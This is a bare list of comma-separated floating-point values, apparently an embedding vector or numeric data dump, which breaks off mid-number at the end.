0.0038935558,0.0132575305,0.029239602,-0.02186284,-0.024406461,0.0008309624,0.025736824,0.02086667,-0.03148179,-0.01354761,-0.018696489,0.0076265703,0.00139789,-0.01608945,-0.0028848043,-0.001513037,0.019591274,-0.041989826,-0.022339916,0.0020088109,0.00045061938,0.043379303,-0.011601023,-0.0033278507,-0.020316668,-0.0007747955,-0.014003337,-0.0041050706,-0.004440629,-0.0030783566,0.008393544,-0.017995419,-0.003085198,0.009336373,0.025570493,-0.017223569,-0.006407691,-0.03381093,-0.015212802,-0.003003615,0.008111729,-0.02269588,0.002512495,0.019395467,-0.0027337377,0.0063370294,0.01628031,0.027436033,-0.019674381,0.019582035,-0.021284383,0.018628838,0.008017633,0.009166337,-0.009275736,-0.008549353,-0.021654744,0.009400191,0.0058293114,-0.0116480915,0.00941048,-0.0071047554,0.017118031,0.0059954706,0.008236634,-0.001793995,-0.0021262236,0.0020583665,-0.007390891,-0.018113578,-0.0020459155,-0.0076788017,-0.0029806586,-0.015894283,0.019037252,-0.021949196,-0.017153153,0.028138172,0.045212127,-0.0039990433,0.021601819,0.022405839,-0.017418629,0.0054915,0.03795688,0.035929523,0.0068778982,-0.027588544,0.006684989,-0.021940999,0.013850451,0.006232544,-0.02481,0.007858407,-0.02438264,-0.0349587,-0.016248222,-0.019724041,0.016701475,-0.015209656,-0.0064153844,0.017298203,0.0074857273,-0.006182093,0.008352915,0.015708543,0.005521896,-0.01499238,-0.019810818,0.014782031,-0.011960557,0.007457322,-0.043470733,0.019826692,-0.005317901,0.0025490397,0.0008741943,-0.011501282,-0.0063204044,-0.011367947,0.0055481032,-0.009854412,-0.0105769895,0.050273683,0.0044317963,-0.021360556,-0.002612683,0.0070641763,-0.007668927,-0.00051953964,-0.016070466,0.005117425,0.0053352914,0.021238413,0.006915357,-0.026722517,0.02970742,0.0045973645,0.017977031,0.01080188,-0.0062514637,0.021560753,0.0006432724,0.021752626,0.004903157,0.012914573,0.027382327,0.0024066258,0.01161293,0.008028035,0.00610912,0.022286072,0.008354117,0.011885929,-0.00538301,-0.0077016153,0.006257334,0.013193921,-0.011159751,0.0021214688,0.008566137,0.0047987457,-0.006828862,-0.005050363,0.008509991,0.01873556,0.007669054,0.011484473,-0.0051797447,-0.009823537,0.009645236,0.00010613645,0.004690691,0.03439828,0.014578741,0.018105207,-0.00081635284,0.018584559,-0.0023360243,0.0005925596,-0.009048353,-0.036566112,-0.013259753,-0.0009510164,0.012116967,-0.002446974,0.004617133,0.03965083,-0.015700338,-0.020767255,0.0060109366,-0.020256884,0.014791569,-0.026218263,-0.011252393,-0.015168285,-0.012213563,-0.0044890093,0.025581663,0.0044954526,0.0031437003,0.01929211,0.011139751,-0.0011374453,0.0027982304,-0.001238161,0.010324971,0.023736006,-0.003389186,0.013876364,0.021742003,-0.029759288,0.018706316,0.015623657,-0.0014814925,-0.03740194,0.0017887458,0.006737843,-0.003067715,0.029122023,0.040844504,0.011898485,0.018643226,0.026004424,0.043411035,-0.003139433,-0.022693451,0.009409387,-0.010721765,-0.012362936,-0.0055671595,-0.00029485865,-0.036613654,0.003976544,0.007856262,-0.016856609,-0.008456533,-0.0031378784,0.023677936,-0.03100579,0.0099528385,0.0008498677,-0.0053533004,0.02400316,-0.0016595831,0.060365994,-0.0036100496,-0.025754599,0.014925353,-0.004890653,0.0056219758,-0.0034460295,0.018842062,-0.028103337,0.008523607,-0.004798318,0.04407092,0.021454185,0.02645544,-0.014726727,-0.005511287,0.003827094,-0.009991993,-0.0027614627,0.003614459,0.0020027137,-0.012953484,-0.007801685,-0.014041896,-0.016733577,0.018081335,0.01353133,-0.0072808876,-0.02484796,-0.034461133,-0.012586307,-0.0094609,0.028723361,-0.012343725,0.008996073,-0.005826189,0.0242134,-0.008450214,-0.01262137,0.03035135,-0.0012081839,0.006997243,0.0066908207,0.012324599,-0.0048524477,-0.002763288,0.009817173,0.0017332041,0.030453146,-0.008853005,0.0035502303,0.031233642,0.0027892564,0.015477083,-0.032755442,-0.00891762,0.032687575,0.008741968,-0.0005142958,0.010939328,-0.0037206116,-0.006385361,-0.029185334,-0.029119473,-0.004984307,-0.0058822967,0.003076767,-0.015803693,0.005425606,-0.033804692,-0.0009967379,-0.011220632,0.0014824617,-0.004257708,0.027306756,0.0025180697,-0.011335868,0.02208288,-0.0027757855,-0.0146751255,0.0059277685,-0.0090953875,-0.0015344183,-0.010417294,-0.015523989,0.015101886,0.011392152,-0.007889461,0.013565377,-0.0010759721,-0.018952075,-0.009735872,-0.0021072174,0.019117994,0.01287365,-0.007973981,0.010343772,-0.018632911,-0.0052055367,0.019105371,-0.021935575,-0.0045603653,-0.024235586,0.02259286,-0.016292162,-0.016836427,-0.010182792,-0.019200029,0.0046676258,-0.017574856,0.011429549,-0.056911763,-0.0021443956,0.0047262497,0.013472595,0.0062624672,0.04123013,0.006335064,0.010918833,-0.002219289,-0.00101111,-0.007520636,-0.019443512,-0.0065853056,0.002030788,0.01724942,-0.0052749664,-0.028547058,-0.023114817,-0.034431618,-0.019807812,0.0007941981,0.033844948,0.0008589711,0.013475428,0.015878187,0.009931066,-0.004465251,-0.0024825428,0.029942816,-0.04356744,0.012210403,0.009160992,0.016054807,0.026638098,0.00085160986,-0.007006468,0.0037015907,-0.018874066,0.0113297505,0.006928694,0.0019296259,-0.007926913,-0.003175056,0.02108121,-0.015970541,0.01977692,-0.0034753245,0.0036577831,0.011043376,0.0054721734,0.015100276,0.0056702304,-0.00102048,0.018312452,-0.012194445,0.030862195,0.008918879,0.03337181,0.014586085,0.014324115,0.0010400105,-0.0021893634,0.019516906,-0.01938125,0.008530061,0.018507231,0.041365735,0.017808646,0.02201238,-0.009555594,0.024105817,0.0033705207,-0.0063933595,-0.014206611,0.022788107,0.024559844,0.014172328,0.034224156,-0.010636664,0.023767086,-0.015067341,-0.034210674,-0.010015139,0.0231183,0.026351009,-0.00812114,0.00887398,0.006788618,-0.0037034436,0.011282334,-0.0019357429,-0.012698527,-0.004249204,-0.017729132,-0.017810676,-0.021291213,0.014236103,-0.02946564,-0.0008403222,0.012933882,0.012605468,0.0033449759,-0.022131372,-0.0074840323,-0.014440809,-0.012893122,-0.05057252,-0.042073775,0.006096954,0.022476947,-0.03105604,0.0016552999,0.010983905,-0.0019844105,-0.001773815,0.011840066,-0.029816298,-0.018868854,-0.019880697,-0.0032228546,0.018860035,0.001855121,0.022108559,-0.0073740734,-0.009585472,-0.0014628451,-0.01959767,-0.008420399,-0.0035477686,0.004749848,-0.00084318744,0.014609355,-0.011752301,0.008389122,-0.021461759,-0.0017404777,0.0056284023,-0.04305371,-0.00498197,0.005542142,0.03000079,-0.0064709634,0.010464467,-0.013347055,0.024099665,0.011839569,0.014861781,0.012641087,-0.028807333,0.013421518,0.0242714,0.02998952,-0.0034455864,-0.034626372,-0.0109873535,0.021902595,-0.005309973,0.0062494464,0.020753268,-0.025865238,-0.026096081,-0.035283472,0.0031827348,-0.023949122,-0.0093184635,0.015343708,-0.007905414,0.03750543,-0.02117714,0.0077210087,0.024766335,-0.0141651435,0.0015294726,-0.012184602,0.0028938786,-0.052668825,-0.030857828,0.017719073,-0.0077674813,0.0031989294,0.01996289,-0.029015474,-0.0013774151,-0.037770223,0.012601424,0.005279866,0.016689641,0.012333292,-0.017292095,-0.019265367,-0.009114293,0.0028855824,0.013065578,-0.01920941,-0.0055878353,0.01372326,0.0112566035,0.016645443,0.015167479,-0.030873267,-0.0002386157,0.008081031,-0.023263065,0.018344242,-0.013298717,0.022100594,0.0057093403,0.0031838547,-0.0027732234,-0.027663434,0.03983661,-0.028377833,-0.015141982,0.021525139,-0.0034111626,-0.010062093,-0.00012423717,-0.025163189,-0.016877003,-0.015321783,-0.0065000355,-0.015590162,0.004122434,-0.013774063,0.024257783,-0.0038110574,-0.008559082,0.025443465,0.020864606,0.012332392,0.0042958762,0.0068720724,-0.015923165,-0.011402383,-0.006362557,-0.012349669,-0.009890681,0.0032783668,-0.0020800885,0.004011674,0.015122752,-0.004701531,-0.009615936,0.020212173,-0.0035933468,-0.019443994,0.028480804,0.0034982632,-0.0079267835,-0.018413799,0.016081827,-0.0037439065,-0.0054024197,-0.02295811,-0.0074732797,0.01530286,-0.0043324707,-0.010729005,-0.007975707,0.003999336,0.013253664,-0.017951192,0.008076626,0.0008913347,0.027226133,-0.012252987,0.008372508,-0.00011118501,-0.011749438,0.027562236,0.0023036117,-0.007811048,-0.00096470304,0.01869864,-0.033164468,-0.013756893,-0.0040822625,-0.013807072,0.018624762,0.013444477,-0.018357703,0.0064002736,0.016683036,-0.0031158915,0.008965528,0.0037255087,-0.025403278,-0.0026192942,-0.012184794,-0.023152398,-0.015843563,0.009926726,0.018905558,0.0027479385,-0.016116684,-0.017057141,-0.0630765,0.018198766,-0.018361343,-0.028591152,0.0021899266,0.013018174,-0.006288949,0.013542989,0.030268071,-0.012849263,0.0027641978,0.030440899,0.006796491,0.009073162,0.015656902,-0.013809633,-0.014010206,0.0018120599,0.027821323,0.006527058,-0.01567899,0.0026861622,0.0106377695,0.020234693,0.034148086,-0.0077622635,-0.004416305,-0.0093263155,-0.028528871,0.026733944,0.0027365803,0.0076354053,-0.003995514,-0.006326547,-0.016490456,-0.004352507,0.0040735668,0.03977227,-0.0012850406,0.0052928175,-0.0068556042,-0.01877848,-0.0032304474,0.029018614,0.0035761602,-0.02733736,0.0059456863,-0.008360639,0.012288315,-0.030665506,0.013764917,0.0073274835,-0.001686881,0.006559326,-0.02686684,0.0317789,-0.014040509,0.024830395,0.032639697,0.01798555,-0.0038536845,-0.002676838,0.024676029,0.007771258,-0.013880198,-0.008840694,-0.016148133,0.035659563,-0.01845333,-0.017687617,-0.000097132855,-0.005984593,-0.0022433922,-0.023546215,-0.014613054,-0.0044075516,-0.007607611,-0.0044381926,-0.00078004843,-0.0131617915,-0.0069001983,0.016894713,-0.015177781,0.0059052557,-0.041030344,-0.0015760907,0.006596967,0.004916067,0.00059494114,0.0016343581,0.007864948,0.0027587146,0.0011249967,0.01525176,0.006634351,0.037564673,0.0138892485,0.014757414,-0.011227743,0.022208406,0.032963116,0.00002051215,-0.007865161,0.039012827,-0.0042671715,0.0008934319,0.018623581,0.018775128,0.011629959,0.01233343,0.0024147958,0.008917813,-0.0019993752,0.025093919,-0.0013208482,0.012637757,0.00018346691,0.029629843,0.0060330336,0.028177831,0.02081227,-0.007981417,0.018407756,-0.007908858,0.025069213,0.01552063,0.014016827,0.007114329,-0.023980085,-0.008521888,0.0014552092,0.019482845,0.0058619594,-0.003190628,0.0015474097,-0.0006276376,-0.0088185165,-0.017694924,-0.01757855,0.014159244,-0.021421103,0.015907908,-0.014218062,0.010249092,0.007810922,-0.0011172757,-0.023352351,0.0060424474,-0.0073333285,0.01785802,0.0153247425,0.0054950416,0.012763846,-0.00245844,-0.013151604,0.015181359,-0.0046218503,-0.016899284,0.015573747,-0.0010933126,0.019910956,-0.022208901,0.0044078245,-0.0029455982,-0.018516058,0.018152332,-0.008403048,-0.015209787,0.001973846,0.0022803938,-0.0071390327,0.02192418,-0.00025503154,0.018707732,0.0077267736,0.0043436545,0.022195121,0.01639315,-0.0012107923,0.013558205,0.0095086675,0.030856974,0.015756918,0.0049945973,-0.0025255147,-0.0064593246,-0.012942684,0.0033637683,-0.015815869,-0.014545286,-0.012139831,0.01676224,0.008415719,0.00017262236,-0.0038904198,0.047837827,-0.0020555516,0.015864536,-0.0016063588,-0.010348923,-0.01154621,0.014632037,0.00797865,0.011880746,-0.019636532,0.020984141,0.012146104,-0.03692829,-0.016304793,-0.01282217,-0.024790913,-0.018139537,0.012572226,-0.0074172197,-0.0066466504,0.001807061,0.007418572,-0.004494652,0.016299468,-0.015260804,0.00096949853,0.026953034,0.0027180573,0.0037657567,0.010912548,-0.013145558,-0.0001522587,-0.0011727682,0.0062682615,-0.0038769874,0.029019024,-0.012199717,0.020201374,0.036577445,-0.018126866,-0.00566983,0.017092275,-0.0007166358,-0.025969196,-0.023328561,0.00493926,0.026614077,0.009183213,-0.0154194655,0.000003717226,0.059816077,0.00038983583,-0.0051824637,0.008080551,0.009464149,0.0016126625,0.015638674,0.019166052,0.014569074,-0.015878607,-0.009031034,-0.018777298,-0.017587168,-0.0036184127,-0.001220686,-0.018441848,0.0027483657,0.005392605,-0.026734332,-0.023514515,-0.008097496,0.00392688,0.0107025895,0.042827938,0.007389453,0.008131436,-0.019160006,-0.01004844,0.018447127,-0.0038123054,-0.0021651285,-0.009107575,-0.023956707,0.013967453,0.0015648248,0.015095746,0.012756285,0.007946083,-0.016409775,-0.008366746,0.017250411,0.01394442,-0.011392447,0.022452062,0.012414905,-0.010883349,-0.0011796393,0.0049439417,0.019640412,0.000089106186,-0.011740548,-0.019144189,0.008928311,0.0019712173,-0.023751201,0.07608438,-0.02220008,0.0058502057,-0.0075939614,-0.0060438686,-0.0094625745,0.015068553,0.0033030102,0.023284124,-0.0065055857,-0.02286749,-0.010621453,-0.0024129457,-0.008399426,0.010934173,-0.020531274,0.008247438,0.004305133,0.0073363124,0.018231649,0.0016973569,-0.012527646,0.00065963174,-0.0135814315,0.0034139343,0.0018467432,0.02177888,0.007653542,0.015236387,-0.0059329914,0.010349235,-0.020361982,0.010421109,0.007818901,-0.0059710266,-0.0018601008,0.012881441,-0.002826272,0.005437306,0.012627112,0.010492272,-0.018412048,0.04383635,-0.008929559,0.00138202,-0.011837591,-0.013334565,-0.0080929,-0.008267111,-0.0010751201,0.0077255,-0.0056696516,-0.010158052,0.015949106,0.008707555,0.02641349,-0.014281882,0.0037844405,0.016986715,-0.0064332946,0.002132304,0.02949404,0.008140357,-0.007884571,-0.008434791,-0.005247625,-0.0039790627,-0.019136334,0.027744541,-0.020584535,0.008939889,0.003516422,-0.00427364,0.004998762,-0.007774779,-0.0034558352,0.012738787,-0.011332167,0.010247412,-0.0015554868,0.010446785,0.005809785,0.041938428,0.0041165906,-0.019268958,-0.0030102287,0.013633555,0.002316268,0.057017695,0.03437075,0.018869169,-0.0035392677,-0.0032063108,0.01550737,0.0034937602,0.015718598,-0.00203505,-0.0056307693,-0.0068060714,-0.0025630966,0.0006534652,0.0019314779,0.012129031,-0.012958151,0.011037971,0.0053473585,0.0023682958,-0.020748155,-0.010680009,0.03185067,0.027052397,0.020391958,-0.028063431,-0.007855998,-0.0032525824,-0.019009639,0.017048527,-0.00799356,0.001921587,0.02397533,0.01793014,0.00026580648,-0.027913835,-0.0580819,0.0049670637,0.14819047,-0.0070761964,0.015611659,0.03504911,-0.0013010551,0.017908964,-0.11775092,0.0059009953,-0.0020871358,0.0048849317,-0.0027155913,0.005236574,0.0024773404,0.019239927,0.004286823,-0.0014054128,0.00004982871,-0.033986513,-0.0041056136,-0.012420528,-0.008474332,0.025510816,-0.0074158283,0.0008115652,-0.02629749,-0.026400512,0.012672257,-0.023099074,-0.0039717397,-0.0012624338,0.0133361295,-0.02241655,0.0047873566,-0.0000954284,-0.01960498,0.0039541153,0.023693446,0.010960119,-0.008318967,-0.014497239,0.015969064,-0.009371344,-0.023681454,-0.03498239,-0.13950963,0.0019281328,-0.022673022,-0.041766744,0.013243859,-0.011668788,0.015102464,0.010315009,0.027182885,-0.0018219101,-0.0034034674,0.019199612,-0.014011412,-0.014775505,0.003162042,0.0054215724,0.0035613854,0.025174104,0.005751923,-0.0048050676,0.0076433793,-0.000037276735,-0.010202525,-0.007545826,-0.029856762,0.00006248212,0.010637296,0.0319444,0.0033757288,-0.0011498145,-0.0066331993,-0.00510968,-0.026464554,0.008785995,0.0055513633,-0.016461834,-0.011923289,0.0189855,-0.023389326,0.030864943,-0.002833572,0.0011812578,-0.021321224,-0.003836407,0.0047233873,0.0031060227,0.01177141,0.0009278432,0.012811022,-0.0003212551,0.026505016,-0.008010105,-0.019179285,-0.0005581035,0.008993705,-0.00836328,0.0048819724,-0.015337877,-0.010814421,0.0132834045,0.00032248566,-0.013431581,-0.005757118,-0.013825934,0.02997203,-0.015852533,-0.00004916772,-0.0418494,-0.008244799,0.005521901,-0.005421243,0.007187096,-0.004828548,-0.015281051,0.018147519,0.00034118406,-0.020142151,-0.0030160465,0.013676121,-0.04117879,-0.021243965,-0.0138084395,0.011767108,-0.02077558,0.005892178,-0.012802003,0.0071967766,-0.001983509,-0.008739514,-0.0016403026,0.0384345,-0.022024358,-0.000935837,0.009484691,0.0048337933,0.0014080688,0.02762719,-0.0044327388,-0.019052502,0.025029695,0.014099487,-0.021402674,-0.017978355,0.00867381,-0.007018353,-0.0008066372,5.6799547e-7,-0.011584325,-0.0039216457,-0.0054366835,-0.0071459888,0.0011364782,0.017064333,-0.008407904,-0.044149067,-0.03706039,0.017617477,-0.006324455,0.012321003,-0.029197609,-0.026087668,-0.00787318,-0.014618453,-0.00075659895,0.0365302,0.012793561,-0.023218067,0.0039223614,-0.006301513,0.013948348,-0.017435836,0.02160603,-0.002838826,0.019279078,-0.0016406378,0.012656387,-0.018002322,-0.0024030574,-0.021316165,-0.018023308,-0.009816779,0.000057477188,-0.013851767,-0.0007719974,-0.00059372373,-0.012287385,0.03419233,-0.008242594,-0.016004367,-0.013735464,0.008931862,0.022242354,-0.018919798,-0.032558773,-0.0006275437,0.081327215,0.008882234,-0.007549527,0.03267144,-0.0010622435,-0.00017793475,0.026568228,-0.007382487,-0.012443434,-0.013727859,0.0021349986,-0.006314065,0.0028556047,0.008298291,-0.027560543,0.019523365,0.009359343,0.011592437,-0.010145831,0.012322675,0.016654817,-0.018997138,-0.018723523,0.019037372,0.016007354,0.008804599,0.024966173,0.0076287393,0.009441214,0.0005093049,0.005078404,-0.016479049,-0.031044604,-0.0033264186,0.0017783946,-0.04215965,-0.009593546,-0.008391107,0.0034813446,-0.025406806,-0.008214612,0.0021424324,0.020135447,-0.015360433,0.005414096,-0.03095261,-0.010801465,0.010086939,0.008767162,0.007842246,0.0061213337,0.0034899844,0.0043595457,-0.0008148837,0.003493439,-0.017593829,-0.0153264515,-0.015763728,0.0103673,-0.01376297,0.01580678,-0.014311058,-0.018964782,0.0071196486,-0.0060730954,0.01819853,-0.0057853297,-0.012895175,0.019629024,0.01090731,0.0081433635,0.005903739,-0.017849669,0.0038776842,-0.00785527,-0.004823963,-0.026060713,0.0030564535,0.00176025,0.024585918,0.0072392924,0.008805363,0.007948083,0.010950856,-0.022546064,-0.036037195,-0.002365647,0.052642047,-0.02503403,0.011723218,0.007900285,-0.00039449846,0.017666912,0.0010325928,0.0065740007,0.014317463,0.033004563,0.0068598185,0.019100754,-0.00038294555,0.015112059,0.0022816593,0.018663403,-0.019163378,0.0074691763,-0.01526913,-0.007142644,0.0015226487,0.0125476,-0.012622472,-0.0009833202,-0.025468584,0.0030783403,-0.02973065,-0.011627606,0.051912062,-0.015424983,0.015198798,0.020171108,0.0047944114,-0.0116249155,-0.008104408,-0.00080809003,-0.006830316,0.031090232,-0.009616617,0.007855619,0.018166263,-0.019894727,0.007612412,-0.0014494514,0.027467664,0.021857055,-0.0076501947,0.012716756,0.001831129,0.0041706404,0.030091086,0.0092778,0.023359228,-0.021320049,-0.022830002,-0.01628008,0.0012698929,-0.028650664,0.023189949,0.025907027,-0.015754346,-0.01122349,0.005592931,0.0028356484,0.0083915545,-0.00963102,0.013151186,0.030842744,0.015787298,-0.010098659,-0.027319688,-0.007140971,-0.024639655,-0.01808942,0.033247992,-0.0020261467,-0.017978631,-0.0014121368,0.022214284,0.033516154,-0.0019085066,0.0024414912,0.0031109245,-0.021097703,-0.008323462,0.0041802498,-0.0063311355,0.008852648,-0.00016149125,0.0030333695,0.012763099,-0.021856107,-0.015206536,0.030142767,0.012065847,-0.0008613832,-0.004224206,-0.008933497,0.016671276,-0.009012069,0.041086193,-0.02478502,0.009503567,-0.0075513404,-0.0022148301,-0.022256615,0.011922672,-0.04840447,-0.013216902,0.005465341,-0.0092009,-0.012904866,0.018850625,0.0016961205,0.0049457266,-0.029953822,-0.014147931,-0.004895468,0.0014020179,0.00220523,-0.011589085,-0.011369369,0.011269754,-0.009681524,0.0012713581,-0.02265945,-0.008013145,-0.0138497185,-0.007677248,0.00009310796,0.019553332,0.021626553,-0.029866442,0.009280235,-0.01095086,-0.008764639,0.025691673,0.0058206646,-0.017719707,-0.03100027,0.06635615,-0.020149618,0.010944072,0.0026624731,0.030699635,0.022421168,-0.011689832,-0.0055108774,-0.015660001,-0.026282683,-0.023547355,-0.030237885,0.009073494,-0.0016233181,-0.053889025,-0.006680502,-0.0024439222,-0.011816522,0.010284452,0.0055380412,-0.0029436366,-0.01023159,0.007851133,0.0015535502,0.0024116728,-0.052964333,-0.011382909,0.005582565,-0.015613558,-0.017137244,0.003403549,-0.013289731,-0.035234123,-0.017934928,-0.015427949,0.006899929,0.011661035,0.0057469183,0.025165774,0.022053558,0.029245475,-0.005381682,0.0043466245,0.003158633,0.00398813,-0.018099792,-0.0042393333,-0.009501531,-0.0398193,0.0024384537,-0.01695396,-0.004880594,0.016701521,0.02230501,-0.02369076,0.00573404,0.013868746,-0.015753055,-0.021471439,0.008323235,0.012301071,-0.019388692,-0.025275176,-0.009023815,0.003425158,0.0027818982,-0.0041366825,-0.02180415,-0.00736003,0.0084991995,-0.0172417,0.004813667,0.0041904026,0.007906859,-0.0029903639,-0.0058771702,0.010756143,-0.00071423163,0.012964724,0.020417413,0.002525226,0.017924745,0.0012726476,-0.015354549,-0.0012383388,0.014004418,0.00860321,0.0032179789,-0.009937254,0.011773118,0.06007228,0.014394694,0.013691795,-0.008347456,0.004198035,-0.002255057,-0.00048032662,-0.025573181,-0.008964794,-0.035779834,-0.024528116,0.022253249,-0.0140283415,-0.0045916815,-0.0071795476,0.003693013,-0.12813254,0.00677583,-0.012033853,-0.017716745,-0.0005101649,-0.010115435,0.015770452,0.024585092,0.015729444,-0.01684764,-0.014440838,0.032080762,0.011370862,0.015294294,0.008837426,0.026498096,-0.017832631,-0.008841878,-0.0053783664,0.010470885,0.012165323,-0.025049642,-0.008403031,0.004548597,0.018775119,-0.006342265,-0.029867627,0.011325934,-0.0026957074,0.0034528594,-0.0046547647,0.0028048458,0.012468457,0.0037568156,0.021447765,0.0022253825,0.009726363,0.011938462,-0.0059947465,-0.017004317,-0.003048119,0.00010043747,-0.010340259,-0.0024289838,0.0052188523,-0.023109272,-0.010800107,0.0227379,0.033424087,0.024090828,-0.012009794,0.0021236285,0.008305422,0.014377791,-0.0024681822,-0.019574475,0.00019584205,0.00021242873,0.0076556397,-0.003231483,0.0013445425,-0.020362249,-0.0047760936,-0.0013598993,0.009602633,-0.0004107002,-0.0015798999,-0.0021076181,-0.010434355,-0.01682821,-0.00028444885,0.02304019,0.006247319,-0.004494177,-0.026805958,-0.0014317055,0.021235457,-0.0097820815,0.0015024509,0.026417049,-0.025481317,-0.014522356,-0.0016283545,0.020101992,0.005926617,-0.022553312,0.012032435,0.016690234,-0.0072313007,0.004213628,0.008109832,0.012231756,-0.0142034665,0.0038522556,-0.013771989,0.015073218,0.0051992475,0.01590916,-0.0075994604,0.0004021318,0.002563072,0.007769277,-0.015905311,-0.027938703,-0.12700766,-0.013949052,0.038130198,-0.015155409,0.0033016277,-0.020126348,0.014742703,0.0011310999,0.037594203,-0.011649021,-0.0018980913,0.026324617,-0.01246292,0.014344188,0.00970268,0.012537263,-0.023794396,0.018025411,0.01383453,-0.0075279023,-0.008670143,-0.026131634,0.024403367,0.02191534,-0.010102308,-0.005734103,0.01226122,0.0295921,0.027652914,0.0084083835,0.0041408953,0.021990603,0.00036880915,0.00957982,-0.014643157,0.0012754622,0.004477598,-0.014111577,-0.013979365,0.014307283,-0.006340387,0.000950267,0.011562751,0.015251039,-0.00375375,-0.021874702,-0.008027465,-0.00010510298,-0.0008158154,-0.017662242,0.0060221087,-0.011758008,0.007625451,-0.01932895,0.0016477158,-0.024496026,0.009501199,0.0118715335,0.018505877,-0.012224592,-0.0073788846,0.00305836,-0.00830122,0.0020436195,-0.01386894,0.009399496,-0.012103381,0.014921997,-0.0072649987,0.008234997,-0.016173368,0.014539695,0.026333146,-0.008996855,0.010025315,0.00889248,0.009791042,0.016863452,0.023706248,0.006321513,-0.010498278,-0.023598436,0.008969582,0.009800505,-0.018829545,0.024947964,-0.0022169703,0.008665652,-0.0017540006,0.028827377,0.0014188922,0.018602405,-0.014636449,0.012783929,0.009554179,-0.004577901,0.060850225,0.012240416,-0.009170525,-0.023957042,-0.0017540102,0.005473505,-0.024213832,0.009025642,-0.011547104,0.032596752,0.0046876254,-0.018669477,-0.02902289,-0.0022583627,-0.0047441632,0.024952231,-0.018882634,-0.003113569,-0.0043895864,0.000045087032,-0.023197051,-0.021708772,0.010745734,0.009314981,0.013895177,-0.010735831,0.0016967518,0.0016188367,0.0018480131,-0.008866502,-0.011675738,0.0033643753,-0.0012813542,-0.017770099,0.011257456,0.0069779125,0.01614324,-0.01904031,0.010704423,0.017324328,-0.020457394,0.006712087,0.021537554,0.009881818,-0.005971975,0.00035781015,-0.008205826,0.010980331,-0.009737162,0.006249936,-0.016458375,0.0028215551,-0.0074744406,-0.013785509,0.0072744675,-0.013065791,0.017642356,0.010701958,0.013131795,0.017097864,-0.026666403,0.024659034,0.018690484,0.0052053635,-0.003088901,0.018178841,0.019593487,-0.009559329,-0.0010467145,0.0010734688,-0.00484934,0.0022109142,0.0076039606,0.0026436963,0.0050598662,-0.0042798403,0.002747002,-0.019594504,0.017361516,-0.0032129756,0.0069479356,0.011854569,0.03199216,0.02766644,-0.0379728,-0.0009869457,-0.011751078,-0.003265667,-0.016867347,0.017534219,-0.01631731,-0.008823914,-0.017847355,-0.024909375,0.027690945,-0.005993521,-0.010858988,-0.011461308,-0.0028720903,0.005137669,0.0050763297,0.030566396,0.01713473,-0.018757807,-0.020141587,0.01284342,0.011386413,-0.033757772,0.010876112,0.010808399,0.0029617264,0.044771627,0.0008466543,-0.015591043,-0.014554721,0.020399356,0.0035063287,-0.009270912,0.001351608,0.03369399,0.008703301,-0.037885014,0.010404392,0.0054007065,0.00026270698,-0.02517469,0.010582605,0.0053676725,-0.004430537,0.036593504,0.019882228,0.02029144,-0.049253896,-0.017015463,-0.013862353,0.0052565783,-0.007359041,-0.026190866,0.0019300405,-0.0101015,0.02081889,0.0017943213,0.0023152044,0.0033615704,0.029533446,0.0032084165,0.019795572,0.018229626,0.012987568,0.0034717387,0.008426915,0.0056284824,0.013783101,0.016418468,0.0031682053,-0.00772775,0.015237906,-0.02382423,0.010218452,0.003898508,-0.0014468307,0.000469751,-0.011395004,-0.0051145707,-0.029498307,-0.01497104,-0.014330948,-0.012845495,0.009069508,-0.008075134,-0.010818474,-0.019942502,-0.00836337,0.0024101925,-0.003679086,0.0066863205,0.014768424,0.029042313,-0.014750296,-0.011948301,0.005483188,0.014307008,0.012269546,0.0052752,0.005605932,-0.020732243,-0.00723227,-0.0005547289,-0.007040968,-0.00057599443,-0.0049184808,0.014602357,-0.009634104,0.0016419749,0.010061761,-0.016254373,-0.0031534177,-0.009275546,-0.0073153526,0.005781135,0.0028842199,0.006748637,0.005856556,0.008985208,0.007498878,0.0017255009,0.022210712,-0.0032159376,0.008665211,0.0058698705,-0.0020411934,0.02552385,-0.0010431753,-0.0015112318,-0.0059914608,0.013397868,-0.008500496,0.023649987,0.00428702,0.012657899,0.010168154,-0.001598585,-0.044562716,-0.0122131575,-0.017698022,-0.00915716,0.015524458,-0.021917222,0.00029658905,-0.0068921926,-0.0066071437,0.026550308,-0.0060403654,-0.008279534,0.03784367,-0.039003387,-0.0015341768,0.011631883,0.03392669,0.009811447,0.023312828,0.038457755,0.0013499081,0.015141388,0.0104389405,-0.008847914,0.0071854824,-0.0038235777,0.0071078693,0.0004924992,-0.0032004903,0.009625596,0.022056194,0.0113864625,0.005266996,0.015656644,-0.006379995,-0.012498934,-0.03419045,0.057541143,-0.019493511,0.005028977,-0.0003371789,0.011261826,-0.022245497,0.0048068673,0.0014003718,-0.0026688972,0.0048139645,-0.0028824166,-0.018796707,0.015834222,-0.016020522,0.008047954,0.004968633,0.010326514,-0.021667428,-0.022033054,0.008952721,-0.079945065,0.0014871741,0.018827748,0.00044482164,0.02701317,-0.0055107446,-0.03306601,0.013601574,0.007230203,-0.0018404115,0.0014003962,0.0014001986,-0.03109821,-0.0049075885,0.017776648,-0.0064246673,0.0044609276,0.0102643985,-0.017533885,-0.026307622,-0.0066557457,0.015339762,-0.0028169916,-0.006639321,0.0075974334,0.02142018,0.0048923725,-0.025020922,0.011792992,0.010735487,-0.003344725,0.008528591,-0.0026200013,-0.01773321,-0.013577501,-0.007506312,0.003937982,0.026296107,-0.03556532,-0.03182952,-0.001513955,0.0026974278,-0.0029853387,0.026741946,-0.02608931,0.017537715,-0.012057083,-0.01815559,-0.013302445,0.0055249752,0.010326383,0.002177068,-0.00066828314,0.011907658,0.0010220261,0.024723353,-0.0064735827,-0.00874525,0.030614685,0.0053447913,-0.021470362,0.010142331,0.0038355952,-0.0037023667,0.0044052275,-0.0069014686,-0.0033544616,0.014539941,0.00651987,-0.0033626277,0.00039674816,-0.030907808,-0.0041318936,-0.015714664,-0.00532934,0.023397561,0.01941004,-0.022216327,-0.009345091,0.0041504055,0.030824376,-0.0128854215,0.026041603,0.0027710071,0.03068805,0.015422847,-0.0074821697,0.020091377,0.034382254,-0.0035002143,0.0045340382,-0.005880677,0.03180618,-0.006647041,0.004463098,0.009571794,-0.0006700701,0.002226003,0.015417559,-0.003983665,0.0026428744,0.002168956,-0.0019478278,-0.004017911,0.007283117,-0.005167795,-0.006083152,-0.004115585,-0.0067374604,0.002462516,0.004563723,0.030278986,0.0089521725,0.042602323,0.035312403,0.012961111,0.0032128613,0.032222506,-0.007890045,-0.009215934,-0.011158504,-0.0064935996,-0.023506785,0.022744628,0.0035178086,-0.0049794526,0.011567759,-0.